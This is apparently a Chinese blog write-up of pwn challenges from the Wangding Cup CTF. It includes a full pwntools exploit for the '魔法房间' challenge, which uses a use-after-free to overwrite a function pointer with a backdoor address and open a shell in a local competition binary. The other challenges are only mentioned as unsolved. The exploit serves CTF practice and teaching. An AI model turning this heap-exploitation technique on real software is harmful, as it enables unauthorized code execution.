网鼎杯朱雀也海星,两个签到,一个格式化字符串,一个fastbin的堆,这俩连后门函数都给了属实水,另外一个0解vm估计防ak,有时间复现看看。
魔法房间
签到题目,感觉直接从hitcon training里的uaf改的,贼简单。不说了,都有后门,水题好吧。
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| from pwn import *
context.log_level='debug'
p=process('./zqpwn2')
elf=ELF('./zqpwn2')
backdoor=0x400a0d
def add(size,content=''):
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil("magic cost ?:")
p.sendline(str(size))
p.recvuntil("name :")
p.send(content)
def show(index):
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('index :')
p.sendline(str(index))
def free(index):
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('index :')
p.sendline(str(index))
add(0x40,'bba');
add(0x40,'aa');
free(0);
free(1);
add(0x18,p64(0x603000)+p64(backdoor));
show(0);
p.interactive()
|
云盾
这题目最后有个格式化字符串,然鹅当时签完到就懒得做了,有时间复现吧,好像还有可以用double free打的
supersafe_vm
vm,出题人真的爱vm,四场比赛5道vm,难顶,有时间复现补上。
